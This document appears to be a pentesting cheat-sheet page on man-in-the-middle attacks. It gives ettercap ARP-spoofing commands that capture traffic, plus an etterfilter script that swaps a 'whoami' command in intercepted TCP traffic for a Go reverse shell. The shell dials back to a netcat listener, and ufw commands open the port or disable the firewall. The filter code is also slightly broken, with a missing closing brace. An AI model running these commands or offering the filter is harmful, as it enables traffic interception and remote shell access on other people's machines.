icon

MITM (Man in the Middle) Attack

Last modified: 2022-12-01

Establish MITM

Using ARP Spoofing

In the target machine,

# -T: text only GUI
# -M: man-in-the-middle attack
# -w: write .pcap file
ettercap -T -i eth1 -M arp -w /tmp/ettercap.pcap
ettercap -T -i eth1 -M arp -w /tmp/ettercap.pcap

In your local machine, transfer the ettercap's output file.

scp victim@<target-ip>:/tmp/ettercap.pcap .

# Investigate the file
wireshark ettercap.pcap

Gain Access to a Shell

Reverse Shell Via ARP Spoofing

In the target machine, create "whoami.ecf" using Golang.

// whoami.ecf
if (ip.proto == TCP && tcp.src == 4444 && search(DATA.data, "whoami")) {
    log(DATA.data, "/root/ettercap.log");
    replace("whoami", "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"<target-eth1-ip>:6666\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go &");
    msg("###### ETTERFILTER: substituted 'whoami' with reverse shell.  ######\n");

Compile the file using "etterfilter"

# Compile the file using etterfilter
etterfilter whoami.ecf -o whoami.ef

Open listener on background

nc -lvnp 6666 &

Disable Firewall for incoming connection

ufw allow in on eth1 from <target-ip> to <target-eth1-ip> port 6666 proto tcp
# or
ufw disable

Execute "ettercap" command.

# Run ettercap
# -F: Filter
ettercap -T -i eth1 -M arp -F whoami.ef

After a while, you should see "Connection received on <target-ip>" in the outputs.
If so, quit "ettercap" with "q" and switch the opening listener to foreground with "fg".
Then you can interecat with the target shell.